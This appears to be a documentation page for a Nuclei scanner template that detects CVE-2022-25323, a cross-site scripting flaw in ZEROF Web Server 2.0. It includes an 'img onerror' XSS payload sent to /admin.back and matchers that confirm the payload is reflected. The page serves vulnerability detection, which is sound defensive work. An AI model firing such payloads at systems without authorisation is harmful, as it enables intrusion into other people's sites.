ZEROF Web Server 2.0 - Cross-Site Scripting
ID: CVE-2022-25323
Severity: medium
Author: pikpikcu
Tags: cve,cve2022,xss,zerof
Description
Section titled “Description”ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
YAML Source
Section titled “YAML Source”id: CVE-2022-25323
info: name: ZEROF Web Server 2.0 - Cross-Site Scripting author: pikpikcu severity: medium description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - https://awillix.ru - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/awillix/research classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-25323 cwe-id: CWE-79 epss-score: 0.00115 epss-percentile: 0.45082 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server shodan-query: cpe:"cpe:2.3:a:google:web_server" tags: cve,cve2022,xss,zerof
http: - method: GET path: - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
matchers-condition: and matchers: - type: word part: body words: - 'back<img src=x onerror=alert(document.domain)>'
- type: word part: header words: - "text/html"
- type: status status: - 401# digest: 490a0046304402210096aa665b66fbaf3fc5ac129b88128b312ccc7ac34e94eca67ddfa77c1de338f0021f0cacdefb22f72c1daa778f1aaa008eb90df50abc99c99cc745ed135bb3f876:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25323.yaml"